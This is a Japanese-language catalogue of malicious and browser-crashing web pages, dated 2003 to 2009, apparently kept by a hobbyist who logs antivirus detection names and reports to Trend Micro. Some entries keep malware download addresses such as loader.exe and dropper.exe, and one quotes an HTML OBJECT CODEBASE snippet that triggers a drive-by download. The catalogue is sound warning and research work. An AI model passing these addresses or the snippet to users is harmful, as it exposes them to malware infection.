通し番号. | URL( 数字→アルファベット順 )
[確認日/掲載日] 鑑定結果/解説 |
← このようになっています。 |
[2007/02/14] | 2007/02/04 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TSPY_ONLINEGA.PT として検出するよう対応、とのこと。 実際に 2007/02/04 にDLしたファイルからウィルス名:TSPY_ONLINEGA.PT を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 恐らく、2007/02/04 から今日までの間にファイルの置き換えがあったと推測される。 |
[2007/05/20] | 2007/02/14 にトレンドマイクロ社にファイルを提出。
2007/02/16 にその結果の連絡があり、ウィルス名:TROJ_AGENT.JWW として検出するよう対応、とのこと。 2007/02/14 にDLしたファイルが手元に無いため、実際に検出対応したかどうかは未確認。 しかも、今日改めて当該URLを確認してみると、404になっていた。 |
[2007/02/14] | 2007/02/04 にトレンドマイクロ社に上記3つのファイルを提出。
今日、その結果の連絡があり、3つのファイルともウィルス名:TSPY_ONLINEGA.PT として検出するよう対応、とのこと。 実際に 2007/02/04 にDLした3つのファイルからウィルス名:TSPY_ONLINEGA.PT を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 恐らく、2007/02/04 から今日までの間にファイルの置き換えがあったと推測される。 |
[2005/01/24] | 海外アダルトサイトだが環境により下の3つのファイルを読み込まれる可能性あり。
//217.73.66.1/del/loader.exe ←ウィルス名:TROJ_BR.A //217.73.66.1/del/cmb_260924.exe ←バスター無反応だがDialer.Win32.PluginAccess.genなる名のdialer //66.230.143.209/loader/dploader.cab ←ウィルス名:TROJ_SMALL.AA |
[2009/04/25] | ファイルサイズ:173 KB 。ウィルス名:TROJ_AGENT.AULZ |
[2008/12/22] | 2重拡張子。ウィルス名:TROJ_DLOAD.DU |
[2005/11/14] | ウィルス名:TROJ_PSW.AJAN |
[2005/11/14] | ウィルス名:BKDR_CHEESER.A |
[2005/11/14] | ウィルス名:TROJ_TAUPE.A |
[2005/11/14] | ウィルス名:BKDR_DONALD |
[2005/11/14] | ウィルス名:BKDR_ECLYPSE.A |
[2005/11/14] | ウィルス名:BKDR_GATECRASH.A |
[2005/11/14] | ウィルス名:BAT_RUNNER.A+TROJ_PSW.INET.20+TROJ_INET20.B |
[2005/11/14] | ウィルス名:BKDR_INIKILL.32 |
[2005/11/14] | ウィルス名:TROJ_KUANG.A |
[2005/11/14] | ウィルス名:BKDR_KUANG_WEIRD |
[2005/11/14] | ウィルス名:PE_WEIRD.DR+BKDR_WEIRD.10240 |
[2005/11/14] | ウィルス名:BKDR_LAMESPY.095 |
[2005/11/14] | ウィルス名:BKDR_NETBUS.153 |
[2005/11/14] | ウィルス名:TROJ_NETSPHER.A |
[2005/11/14] | ウィルス名:BKDR_POD.A |
[2005/11/14] | ウィルス名:TROJ_PSPITTER.A |
[2005/11/14] | ウィルス名:BKDR_SATANSBD.A |
[2005/11/14] | ウィルス名:TROJ_EX1_DEC+BKDR_EXECTRL.A |
[2005/11/14] | ウィルス名:TROJ_SENNASPY.A |
[2005/11/14] | ウィルス名:BKDR_TSCOUT.A |
[2007/05/27] | ウィルス名:TSPY_MARAN.D |
[2005/01/28] | 真っ白なページだがウィルス名:HTML_MHTREDIR.A を検出。
そして、そのまま放置しているとウィルス名:JAVA_BYTEVER.A を検出。 |
[2005/09/18] | 「dropper.chm」という名のコンパイル済みHTMLヘルプファイルが落ちてくる。
バスター無反応だが、以下のアンチウィルスソフトで反応。 BitDefender → Dropped:Trojan.Downloader.Small.AWY, Exploit.Html.Codebase.Exec.Gen ClamAV → Exploit.HTML.CodeBase.A Kaspersky → Trojan-Downloader.Win32.WarSpy.d NOD32 → Win32/Adware.Serch application VBA32 → Trojan-Downloader.Win32.WarSpy.d |
[2005/09/18] | ウィルス名:TROJ_WARSPY.B |
[2005/09/18] | ウィルス名:TROJ_WARSPY.B |
[2005/08/16] | ウィルス名:JAVA_BYTEVER.A |
[2005/08/16] | ウィルス名:TROJ_WARSPY.B |
[2005/08/16] | ウィルス名:EXPL_IFRAMEBO.A |
[2005/09/12] | 再確認。踏むと「js_ad0497.php」というPHP_AUTO_FILEという種類のファイルが落ちてくるが、ウィルス名:EXPL_IFRAMEBO.A を検出。
ソースはコード変換されていて読めないようになっている。 |
[2005/08/16] | ウィルス名:EXPL_IFRAMEBO.A+JAVA_BYTEVER.A
以下のURLと関連付けられている。
これとは別にJAVA APPLETで 2. を発動し、3. を落とす。 |
[2005/09/12] | 再確認。踏むと真っ白なページだが、いきなりウィルス名:EXPL_IFRAMEBO.A を検出。
このURLに関係する悪玉ファイルは以下の3つ。3つともウィルスを検出する。 //www.wearehosters.com/v497/js_ad0497.php //www.wearehosters.com/v497/count.jar //www.wearehosters.com/v497/dropper.exe |
[2005/08/16] | ウィルス名:TROJ_WARSPY.B
踏むと真っ白なページだが、有無を言わさず、いきなり //www.wearehosters.com/v497/dropper.exe をDLさせられる。 ソースは以下のようになっている。 <OBJECT NAME='X' CLASSID='CLSID:11120607-1001-1111-1000-110199901123' CODEBASE='dropper.exe'> <a href="dropper.exe"></a> |
[2005/09/29] | ウィルス名:TROJ_WARSPY.B |
[2005/07/03] | ウィルス名:PE_JEEFO.A |
[2005/08/26] | ウイルス名:TROJ_DELF.MZ |
[2006/08/07] | ウィルス名:TROJ_DELF.CDI |
[2006/07/30] | ウィルス名:DIAL_PAGOMAS.A |
[2009/04/25] | ファイルサイズ:2.91 MB 。ウィルス名:MAL_BANKER |
[2009/04/25] | ファイルサイズ:各153 KB 。ウィルス名:MAL_BANKER |
[2009/04/25] | DL+解凍すると「Intimacao.exe」ファイルが現れるが、ウィルス名:MAL_BANKER を検出。
ファイルサイズ:143 KB 。 |
[2009/04/25] | ファイルサイズ:143 KB 。ウィルス名:MAL_BANKER |
[2006/01/03] | Kaspersky Anti-Virus で AdWare.Win32.Dogpile.a を検出。 |
[2006/07/05] | DL+解凍すると「Toolbar_cobrand.exe」という名のアプリケーションが現れる。
バスター無反応だが、以下のアンチウィルスソフトで反応。 Fortinet → Adware/DogPile Kaspersky → not-a-virus:AdWare.Win32.Dogpile.a VBA32 → AdWare.Win32.Dogpile.a この「Toolbar_cobrand.exe」をトレンドマイクロ社に提出して調査を依頼。 本日、返事があり、その結果は以下。 お問い合わせいただきました件ですが、ご提供ただきましたファイルの解析を行わせていただきましたが、不正なコードは存在しておらず、ウイルスではないことが確認できました。 ----------------------------------------------------------- ■ 詳細結果結果 ----------------------------------------------------------- Toolbar_cobrand.exe → webcrawler アプリケーション setup.inf → 安全なテキストファイル ----------------------------------------------------------- 上記ファイルはウイルス/スパイウェアではございませんので、ご安心ください。 なお、不要なファイルということでしたら、お客さまのご判断の元に削除を行ってくださいますようお願い申し上げます。 =========================================================== 一般の分類や他のセキュリティ対策ソフトウェアなどでは、弊社とは異なる基準にて「スパイウェア」と判断している場合があります。 このため、一般に「スパイウェア」「アドウェア」に分類されているものであってもトレンドマイクロ製品ではウイルスとして検出される場合がございます。 また、他のスパイウェア対策ソフトウェアでは「スパイウェア」として検出されるプログラムでも、トレンドマイクロ製品では検出されない場合やその逆にトレンドマイクロ製品でのみ検出されるような場合もございます。 |
[2006/01/03] | スパイウェア配布サイトと思われる。こんな感じ のサイトで、ダイアログを表示して何かをインストールするよう催促してくる。 |
[2006/08/24] | 2006/08/09 にトレンドマイクロ社にファイルを提出。
今日、連絡があり、ウィルス名:TSPY_BANKER.EOE として検出するよう対応した、とのこと。 2006/08/09 にDLしたファイルからウィルス名:TSPY_BANKER.EOE を検出することを確認。 また、今日改めてDLしてみてもウィルス名:TSPY_BANKER.EOE を検出することを確認。 |
[2006/10/18] | 海外サイトだが、ウィルス名:JS_EXCEPTION.GEN を検出。
ソースを見ると、IFRAMEタグで複数のURLを呼び出しているが、その中の以下のURLがウィルスの発動元である。 //67.15.114.122/my_stat.php |
[2006/10/27] | 2006/10/15 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_ERODIAL.AH として検出するよう対応、とのこと。 実際に 2006/10/15 にDLしたファイルからウィルス名:DIAL_ERODIAL.AH を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_ERODIAL.AH を検出することを確認。 |
[2005/03/23] | バスター無反応だが、以下のアンチウィルスソフトでウィルスを検出。
AntiVir → TR/Downloader.Agent.GV BitDefender → Trojan.Downloader.Agent.GV ClamAV → Trojan.VB-1 Dr.Web → Trojan.MulDrop.1564 Kaspersky Anti-Virus → Trojan-Downloader.Win32.Agent.gv NOD32 → Win32/TrojanDownloader.Wiser.A |
[2006/07/28] | 再確認。ウィルス名:PE_Generic |
[2007/04/06] | ウィルス名:WORM_SDBOT.GEN-1 |
[2006/10/29] | こんな感じ のサイト。ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y+JS_DLOADER.GCD を検出。
ソースを見るとIFRAMEタグで以下の2つのURLを呼び出している。 1、//fdghewrtewrtyrew.biz/adv/168/new.php ← このURL List解説を参照。 2、//fdghewrtewrtyrew.biz/adv/new.php?adv=168 ← バスター無反応だが、注意。 |
[2009/04/25] | DL+解凍すると「westsidestory_weblaunch.dll」ファイルが現れるが、ウィルス名:ADW_MYCSHBAG.A を検出。
スパイウェアの一種:アドウェアに属するものと思われる。ファイルサイズ:46.6 KB 。 |
[2005/02/04] | ウィルス名:JAVA_BYTEVER.A を検出し、//www.xoras.net/ に飛び、[ [ [ X O X O T A S G O S T O S A S ] ] ]という名でお気に入りに登録しろ、と言ってくる。
そのうち、別のエロサイトがブラクラ並に次々と開いていき、再びウィルス名:JAVA_BYTEVER.A を複数検出。 |
[2005/03/28] | 踏むたびに飛び先が違う。しかし、検出されるウィルスは同じ。
ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1 飛び先には別窓で //www.traffic.albacash.com/ が必ず付いているのを確認。 私が何回か確認した中で厄介だった飛び先URLが //www.bailefunk.com/ で、踏むとお気に入りに登録するか聞いてきて、キャンセルを選ぶと、次々にウィルス付きサイトを表示して、お気に入りに登録しろ、と繰り返し催促してきたり、閉じるたびに別窓数枚を開いてくる。その別窓もウィルス付きだったりして、一つ一つ確認する余裕がなかった。 |
[2005/04/12] | 改めて確認。ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.M を検出。
そのうち、ウィルス名:TROJ_ANICMOO.D+JAVA_BYTEVER.A+JAVA_BYTEVER.C も検出する。 ゆっくりとだが次々と別窓が開いていき、次々とウィルスを検出。 それぞれの別窓がそれぞれ読み込んでいるため、PCの動作が重くなり、その間もゆっくりとだが次々と別窓を開いていく。 非力のPCでは場合によりそのまま放っておくとリソース不足に陥る。強制終了で脱出。 |
[2006/01/08] | 他の方の結果は以下の「」内。
「洋リンク系サイトなのかな。リンククリックで窓大きくされます。漏れの環境ではそこまでウイルス反応なしでした。」 |
[2005/12/19] | スパイウェアの一種:アドウェア配布サイト。このページ表示まで無害で、普通に閉じれる。
こんな感じ のサイトだが、画面中央下の「download」ボタンをクリックすると、「SetupSearchBar.exe」なるものがDL出来るが、アドウェア名:SAVENOW を検出。 |
[2006/01/29] | バスター無反応だが、以下のアンチウィルスソフトで反応。アドウェアが含まれている。
AntiVir → Adware-Spyware/SaveNow.BO.26 adware AVG → Generic.FCE Dr.Web → Adware.SaveNow Fortinet → Adware/SaveNow Kaspersky → not-a-virus:AdWare.Win32.SaveNow.bo NOD32 → Win32/Adware.SaveNow application UNA → Adware.SaveNow VBA32 → AdWare.Win32.SaveNow.bo |
[2006/08/04] | 2006/07/27 にトレンドマイクロ社に「SetupSearchBar.exe」ファイルを提出。
2006/08/01 に連絡があり、現在のパターンファイル以降にてウィルス名:ADW_SAVENOW.AU として検出するよう対応、とのこと。 2006/08/01 時点では、バスター無反応だったが、今日、当該URLからDLしてみると、ウィルス名:ADW_SAVENOW.AU を検出することを確認。 |
[2005/04/15] | ウィルス名:ADW_SAVENOW.A |
[2005/04/15] | ウィルス名:ADW_WHENUSRCH.B |
[2005/04/15] | ウィルス名:ADW_WHENUSRCH.D |
[2004/11/23] | mailtoストーム。 |
[2007/03/20] | 海外アダルトサイトだが、ウィルス名:HTML_PSYME.AIH+EXPL_WMF.GEN を検出。 |
[2005/02/24] | //soundpage.by.ru/enter.html に飛び、更に //gb.bbs.ws/book.php?book=xtrime に飛ぶ。
ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.C+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1 |
[2006/10/18] | 海外サイトだが、ウィルス名:JS_EXCEPTION.GEN を検出。
ソースを見ると、IFRAMEタグで複数のURLを呼び出しているが、その中の以下のURLがウィルスの発動元である。 //67.15.114.122/my_stat.php |
[2005/11/16] | スパイウェアの一種:keylogger [ キーロガー ] ソフトを無料配布または販売しているサイト。
このページ表示まで無害で、普通に閉じれる。このサイトのキャプ画面は こんな感じ である。 簡易バージョンはフリーソフトになっており、誰でも無料で入手可能。完全バージョンは有料になっている。 |
[2006/10/13] | 2006/10/08 にトレンドマイクロ社に提出。
今日、その結果の連絡があり、ウィルス名:SPYW_QUICKLOG.AA として検出するよう対応、とのこと。 実際に 2006/10/08 にDLしたファイルからウィルス名:SPYW_QUICKLOG.AA を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:SPYW_QUICKLOG.AA を検出することを確認。 |
[2004/09/24] | //www.albinoblacksheep.com/flash/you.html を呼ぶ。 |
[2005/02/04] | 閉じると2つの「you are an idiot!」がディスクトップ内を飛び始め、それを閉じると同じ物が増え始める。 |
[2005/09/29] | 踏むと「Willy's Park / imgboard」という名の画像掲示板だが、投稿者により、すぐに //www.maxy.net.ru/adult/ に飛ぶのだが、そこから先が奇妙な挙動をする。詳細は //www.maxy.net.ru/adult/ のURL解説を参照。 |
[2006/01/29] | こんな感じ のスパイウェア配布サイト。このページ表示まで無害で、普通に閉じれる。 |
[2006/01/29] | バスター無反応だが、以下のアンチウィルスソフトで反応。キーロガーが含まれており、スパイウェアの中でも悪質なものと判断。
AntiVir → Heuristic/Backdoor.VB5 heuristic, Trojan/Spy.WinSpy.J.9 (probable variant) ArcaVir → Trojan.Spy.Winspy.J Dr.Web → BackDoor.Generic.1199, modification of BackDoor.Generic.1198 Fortinet → Spy/Winspy Kaspersky → Found Trojan-Spy.Win32.WinSpy.j NOD32 → a variant of Win32/WinSpy.C application VBA32 → Trojan-Spy.Win32.WinSpy.j, Trojan-Spy.Agent.45, BackDoor.Generic.1199, Trojan-Spy.VB.1 |
[2006/09/02] | ファイルサイズ:2434KB = 2.434MB
2006/07/27 にトレンドマイクロ社に上記URLを報告。調査してもらった。 2006/08/02 にその結果の連絡があり、スパイウェアパターンファイル「0.398.18」にてウィルス名:SPYW_WINSPY.O として検出するよう対応、とのこと。 2006/07/27 にDLしたファイルからウィルス名:SPYW_WINSPY.O を検出することを確認。 しかし、今日までに何回かDLしてみたが、ウィルス未検出。 恐らく、新しいファイルに随時置き換えられるURLと推測される。 |
[2007/04/28] | ウィルス名:TSPY_LINEAGE.DYQ |
[2007/04/28] | 2006/11/26 にトレンドマイクロ社にファイルを提出。
2006/12/01 にその結果の連絡があり、ウィルス名:TSPY_LINEAGE.DSB として検出するよう対応、とのこと。 しかし、今日改めてDLしてみるとウィルス名:TSPY_LINEAGE.GAM を検出する。 |
[2007/04/28] | 他の方の結果は以下。
rar解凍が可能です。以下の2つのファイルが入っています。 「謎底.txt」← 文字化けして読めません。 「2.sfx.exe」← 実行すると以下のファイルなどを作成。 C:\Program Files\Windows Media Player\svchost.exe C:\WINDOWS\system32\PDLL.dll プロセス常駐有。恐らくキーロガーか何かだと思います。 |
[2005/09/20] | 以下のURLに飛ぶので、そちらのURL解説を参照。
//www.errorsafe.com/pages/scanner/index.php?aid=rwfxn8&lid=pp&ax=1&ex=1 |
[2006/10/01] | 2006/09/24 にトレンドマイクロ社にファイルを提出。
2006/09/29 にその結果の連絡があり、ウィルス名:TROJ_ZLOB.AUW として検出するよう対応、とのこと。 2006/09/24 にDLしたファイルからウィルス名:TROJ_ZLOB.AUW を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 恐らく、新しいファイルに随時置き換えられるURLと推測される。 |
[2005/04/17] | ウィルス名:SPYW_ACTKLOG.261 |
[2005/11/07] | ファイルサイズ:728KB 。以下のアンチウィルスソフトでも反応。このexeの正体はスパイウェア:キーロガーである。
BitDefender → Trojan.Hideproc.I Dr.Web → Program.Activekeylog Fortinet → Spy/ActiveKeyLogger.26 Kaspersky Anti-Virus → not-a-virus:Monitor.Win32.ActiveKeyLogger.26, not-a-virus:Monitor.Win32.ActiveKeyLogger.24 |
[2007/02/03] | 再確認。ウィルス名:TROJ_HIDEPROC.K |
[2009/02/02] | ウィルス名:JOKE_RENOS+MAL_RENOS-3 |
[2008/10/15] | ウィルス名:TROJ_DLOADR.KF |
[2009/02/02] | ウィルス名:TROJ_FAKEAV.IQ |
[2009/02/12] | 2009/02/02 にDLしたファイルにはウィルス名:TSPY_ONLINEG.BAM として対応済。
しかし、今日改めて当該URLからDLしてみると、バスター無反応。 恐らく、不定期的にファイルの置き換えをしているものと思われる。 |
[2009/02/02] | ウィルス名:TSPY_ONLINEG.FSD |
[2009/02/02] | ウィルス名:TSPY_ONLINEG.BDG |
[2009/02/02] | ウィルス名:TSPY_ONLINEG.ZVX |
[2009/02/02] | ウィルス名:MAL_OLGM-6 |
[2009/02/02] | ウィルス名:TSPY_ONLINEG.FSD |
[2009/02/02] | ウィルス名:TSPY_ONLINEG.GSP |
[2009/02/02] | ウィルス名:TSPY_ONLINEG.BDG |
[2009/02/02] | ウィルス名:TSPY_ONLINEG.JDZ |
[2009/02/02] | ウィルス名:TSPY_ONLINEG.GVV |
[2009/02/02] | ウィルス名:CRYP_MANGLED |
[2009/02/02] | ウィルス名:TSPY_ONLINEG.FSD |
[2009/02/02] | ウィルス名:TSPY_ONLINEG.BDG |
[2009/02/02] | ウィルス名:CRYP_MANGLED |
[2009/02/12] | 2009/02/02 にDLしたファイルにはウィルス名:TROJ_VUNDO.MCL として対応済。
しかし、今日改めて当該URLからDLしてみると、ウィルス名:TSPY_ONLINEG.FSD を検出。 恐らく、不定期的にファイルの置き換えをしているものと思われる。 |
[2009/02/02] | ウィルス名:TSPY_ONLINEG.FSD |
[2009/02/02] | ウィルス名:TROJ_PACKED.BZN |
[2009/02/02] | ウィルス名:TSPY_ONLINEG.BZM |
[2009/02/02] | ウィルス名:TSPY_ONLINEG.FSD |
[2009/02/02] | ウィルス名:TSPY_ONLINEG.MDX |
[2009/02/02] | ウィルス名:TSPY_ONLINEG.FCU |
[2009/02/02] | ウィルス名:CRYP_MANGLED |
[2009/02/02] | ウィルス名:HKTL_DUCKY |
[2009/02/02] | ウィルス名:MAL_OLGM-6 |
[2009/02/02] | ウィルス名:TSPY_ONLINEG.FYH |
[2009/02/02] | ウィルス名:TSPY_QQGAME.CK |
[2009/02/02] | ウィルス名:TROJ_AGENT.AKJY |
[2008/10/09] | 軽いブラクラの一種と思われる。バスターは無反応。
確認してみると、こんな感じ のページで、ポップアップは これ が11枚開く。 順次、閉じていけば それで終わり。 |
[2008/10/09] | 他の方の結果は以下の「」内。
「ブラクラと言えばその範疇に入りますが、当方PC無害。「情報モラルを学ぼう」なるインターネットお勉強サイトの一ページ。 ブラウザで開くとJSが少し暴れ、「壊しちゃった」等と表示されます。」 |
[2008/11/11] | 「setup.exe」なるファイルが落ちてくるが、ウィルス名:PAK_GENERIC.001 を検出。 |
[2009/04/25] | ファイルサイズ:32.9 KB 。ウィルス名:TROJ_USBINE.G |
[2009/01/23] | ウィルス名:BKDR_PCCLIEN.AFR |
[2009/05/04] | ファイルサイズ:2.12 MB 。ウイルス名:Win32:Downloader-AZY |
[2009/03/04] | ファイルサイズ:2.13 MB 。ウィルス名:BKDR_PCCLIEN.AFR |
[2009/01/25] | ウィルス名:BKDR_PCCLIEN.AFR |
[2006/12/30] | ウィルス名:TSPY_Generic |
[2007/05/18] | 2006/12/30 にトレンドマイクロ社にファイルを提出。
2007/01/11 にその結果の連絡があり、ウィルス名:TROJ_BANLOAD.PK として検出するよう対応、とのこと。 実際に 2006/12/30 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_BANLOAD.PK を検出することを確認。 2006/12/30 から今日までのファイルの置き換えは無いと推測される。 |
[2007/04/29] | 2007/01/02 にトレンドマイクロ社にファイルを提出。
2007/01/11 にその結果の連絡があり、ウィルス名:TROJ_Generic として検出するよう対応、とのこと。 実際に 2007/01/02 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_Generic を検出することを確認。 2007/01/02 から今日までのファイルの置き換えは無いと推測される。 |
[2006/10/18] | 海外サイトだが、ウィルス名:JS_EXCEPTION.GEN を検出。
ソースを見ると、IFRAMEタグで複数のURLを呼び出しているが、その中の以下のURLがウィルスの発動元である。 //67.15.114.122/my_stat.php |
[2007/01/11] | 2006/12/30 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TSPY_DIAMIN.SP として検出するよう対応、とのこと。 実際に 2006/12/30 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TSPY_DIAMIN.SP を検出することを確認。 2006/12/30 から今日までのファイルの置き換えは無いと推測される。 |
[2007/01/15] | ウィルス名:TSPY_DIAMIN.SP |
[2007/01/11] | 2006/12/30 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TSPY_DIAMIN.SP として検出するよう対応、とのこと。 実際に 2006/12/30 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TSPY_DIAMIN.SP を検出することを確認。 2006/12/30 から今日までのファイルの置き換えは無いと推測される。 |
[2006/04/18] | こんな感じ のサイトで、偽装アンチスパイウェア配布サイトらしいが、詳細は不明。このページ表示まで無害で普通に閉じれる。 |
[2004/11/10] | ウィルス名:HTML_REDIR.A+JAVA_BYTEVER.A |
[2005/01/02] | ウィルス名:JAVA_BYTEVER.A+JS_SMALL.D 。別窓がいくつか開き、別窓からもウィルス検出。 |
[2005/02/01] | ウィルス反応し、お気に入りに勝手に登録しようともしてくる。 |
[2006/01/03] | 再確認。海外アダルトサイト。ウィルス名:TROJ_NASCENE.GEN+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC
放っておくと色々なアダルトサイトが次々と開いていき、その中に脱出困難なサイトがある。 |
[2005/04/10] | 踏むと画像そのものではなく、サムネイル画像+リンクページ。
ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.A-1+JAVA_BYTEVER.M 別窓で//www.porn-nook.com/index.htmlを表示。共に普通に閉じれる。 |
[2005/06/26] | 改めて確認。404になっている。 |
[2005/08/04] | 再確認。生きている。 |
[2005/10/23] | お寄せいただいた情報では、
「ZangoからのFree Site Access By Zango Search ToolsというActiveXをDLするように求められます。 とんでもなく重いです。Cabファイルをインストールしているといわれリソースが足りないと言われました。 一分ほど待ってみましたがウィルス、スパイウェア、別窓オープンはありませんでした。」 |
[2006/01/05] | 海外アダルトサイト。踏むとまず、ウィルス名:TROJ_NASCENE.GEN を検出。数秒してウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC を検出。 |
[2006/01/08] | 他の方の結果は以下の「」内。
「洋アダルトサイト。裏で別URLを延々と読み込んでいる。」 |
[2006/03/04] | 海外アダルトサイト。検出したウィルス名は以下。また、「xpl.wmf」ファイルをDLしろ、と言ってくる。
ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC |
[2005/03/24] | ウィルス名:TROJ_STARPAG.PX |
[2008/07/30] | ウィルス名:TSC_GENCLEAN+TSPY_DELF.HQA |
[2005/01/02] | 無限JavaScript。mailtoストーム。 |
[2009/04/25] | ファイルサイズ:69.5 KB 。ウィルス名:CRYP_UPACK |
[2009/04/25] | ファイルサイズ:180 KB 。Windows Defender が TrojanDownloader:Win32/Agent.BA として警告する。 |
[2009/04/25] | ファイルサイズ:13.5 KB 。ウィルス名:PAK_GENERIC.001 |
[2009/04/25] | ファイルサイズ:41.5 KB 。ウィルス名:CRYP_UPACK |
[2009/04/25] | ファイルサイズ:161 KB 。ウィルス名:CRYP_MANGLED |
[2009/04/25] | ファイルサイズ:149 KB 。ウィルス名:CRYP_XIN1 |
[2009/04/25] | ファイルサイズ:61.3 KB 。ウィルス名:BKDR_PCCLIEN.AFR |
[2009/04/25] | 真っ白なページだが、ウィルス名:VBS_PSYME.CPC を検出。 |
[2009/04/25] | DL+解凍すると「mm.exe」ファイルが現れるが、ウィルス名:WORM_DLOADER.RRD を検出。 |
[2009/04/25] | 真っ白なページだが、ウィルス名:JS_DLOADR.VJ を検出。 |
[2009/04/25] | 真っ白なページだが、何かを呼び出している形跡がある。
バスター無反応だが、他社製ウィルス駆除ソフトでは反応があると思われる。 |
[2009/04/25] | 真っ白なページだが、ウィルス名:JS_REAPLAY.B を検出。 |
[2009/04/25] | 真っ白なページだが、ウィルス名:JS_AGENT.ANLO を検出。 |
[2009/04/25] | ファイルサイズ:32.9 KB 。ウィルス名:TROJ_USBINE.G |
[2009/04/25] | 真っ白なページだが、ウィルス名:VBS_PSYME.CPC を検出。 |
[2008/10/08] | 真っ白なページだが、ウィルス名:JS_OBFUS.CC を検出。2回目以降の確認ではウィルス未検出。
このサイトは、'RealNetworks,Inc.'からの'RealPlayer plug-in for Internet Explorer'アドオンを実行しようとしている。 また、このサイトは、IFRAMEタグを使って //59.34.216.143/a1/fxx.htm を呼び出している。 |
[2008/10/06] | 真っ白なページだが、ウィルス名:JS_OBFUS.CC+JS_DLOADR.VW を検出。
このサイトは、'RealNetworks,Inc.'からの’RealPlayer plug-in for Internet Explorer'アドオンを実行しようとしている。 ソースを見ると、IFRAMEタグで以下のURLを呼び出している。 //wm.zdq003.cn/a1/fxx.htm |
[2008/10/12] | 真っ白なページだが、ウィルス名:JS_AGENT.ARUY を検出。
このサイトは、'RealNetworks,Inc.'からの'RealPlayer plug-in for Internet Explorer'アドオンを実行しようとしている。 ソースを見ると、IFRAMEタグで //wm.wrmfwu.cn/a5/fxx.htm を呼び出しているのが原因。 |
[2006/09/14] | 2006/09/03 にトレンドマイクロ社にDL+解凍して現れた「whistlesilent.exe」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:ADW_WHISTLES.A として検出するよう対応した、とのこと。 2006/09/03 にDLしたファイルからウィルス名:ADW_WHISTLES.A を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:ADW_WHISTLES.A を検出することを確認。 |
[2005/12/04] | ウィルス名:TROJ_SMALL.PV |
[2006/08/30] | 再確認。ウィルス名:TROJ_Generic |
[2006/09/14] | 2006/09/03 にトレンドマイクロ社にDL+解凍して現れた「whistlesilent.exe」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.EAM として検出するよう対応した、とのこと。 2006/09/03 にDLしたファイルからウィルス名:TROJ_DLOADER.EAM を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:TROJ_DLOADER.EAM を検出することを確認。 |
[2006/08/30] | ウィルス名:TROJ_Generic |
[2005/11/03] | 海外アダルトサイト。ウィルス名:HTML_REDIR.AI+JAVA_BYTEVER.A |
[2006/01/03] | 再確認。「ページを表示できません」となる。 |
[2003/01/10] | 無限ループ有り。 |
[2005/10/23] | //www.wwidevideo.com/site/index.asp?DL=6636に飛ぶが無害。 |
[2007/05/20] | ウィルス名:TROJ_Generic |
[2006/06/17] | DL+解凍後、「_ipsec_.reg」を実行するとレジストリの一部を改ざんされる。 |
[2006/11/24] | ウィルス名:REG_ANTIFIREWA.B |
[2006/06/17] | DL+解凍後の「vbsys2.dll」にはバスター無反応だが、以下のアンチウィルスソフトで反応。
AntiVir → Trojan/Click.Agent.AC Dr.Web → Trojan.Click.1140 Kaspersky → Trojan-Clicker.Win32.Agent.hv VBA32 → Trojan-Clicker.Win32.Agent.hv |
[2006/06/17] | 解凍すると「epl.exe」というexeが現れるが、真っ白のアイコンで外見上、見えないので注意。
バスター無反応だが、以下のアンチウィルスソフトで反応。 AntiVir → Trojan/LipGame.W.2 Dr.Web → Trojan.DownLoader.2163 Kaspersky → Trojan.Win32.Dialer.qc NOD32 → probably a variant of Win32/Dialer.EB VBA32 → Malware.Agent.20 |
[2006/06/29] | トレンドマイクロ社から連絡あり。
「epl.exe」をスパイウェアパターンファイル「0.385.00」にてウィルス名:DIAL_RAS.FZ として検出するよう対したとのこと。 実際に「epl.exe」からウィルス名:DIAL_RAS.FZ を検出することを確認。 |
[2006/12/01] | 2006/11/18 にトレンドマイクロ社にcabファイルの中の「epl.exe」ファイルを提出。
2006/11/29 にその結果の連絡があり、ウィルス名:DIAL_LIPGAME.AC として検出するよう対応、とのこと。 実際に 2006/11/18 にDLしたファイルからウィルス名:DIAL_LIPGAME.AC を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 新しいファイルに置き換えられている。 |
[2006/06/17] | 解凍すると「epl.exe」というexeが現れるが、真っ白のアイコンで外見上、見えないので注意。
バスター無反応だが、以下のアンチウィルスソフトで反応。 AntiVir → Trojan/LipGame.W.2 Dr.Web → Trojan.DownLoader.2163 Kaspersky → Trojan.Win32.Dialer.qc NOD32 → probably a variant of Win32/Dialer.EB VBA32 → Malware.Agent.20 |
[2006/06/29] | トレンドマイクロ社から連絡あり。
「epl.exe」をスパイウェアパターンファイル「0.385.00」にてウィルス名:DIAL_RAS.FZ として検出するよう対したとのこと。 実際に「epl.exe」からウィルス名:DIAL_RAS.FZ を検出することを確認。 |
